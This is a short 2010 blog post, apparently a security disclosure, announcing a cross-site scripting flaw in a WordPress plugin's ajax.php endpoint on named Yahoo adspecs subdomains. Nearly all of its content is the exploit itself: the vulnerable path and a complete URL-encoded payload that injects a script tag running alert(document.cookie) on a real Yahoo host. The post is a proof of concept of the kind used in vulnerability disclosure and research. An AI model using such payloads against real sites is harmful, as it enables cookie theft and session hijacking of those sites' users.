Friday, October 8, 2010

[Web]Yahoo! XSS Vulnerability

0

###################################
# Author: Ne0h
# Type: XSS
# Bug: Word Press Plugin
# Path: wp-content/plugins/spectacular/ajax.php?ys_action=addtocart&cb=0%2E00619642219737 27085&pgid=4203&prop=1[xss]
# Team: InSecurity.Ro
# Site: http://www.InSecurity.Ro
# Yahoo subdomain affected:
# adspecs.yahoo.etc
# Ex:
# http://adspecs.yahoo.it/wp-content/plugins/spectacular/ajax.php?ys_action=addtocart&cb=0.0061964221973727085&pgid=4203&prop=1%3C/title%3E%3CScRiPt%20%0d%0a%3Ealert(document.cookie);%3C/ScRiPt%3E
#################################################

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting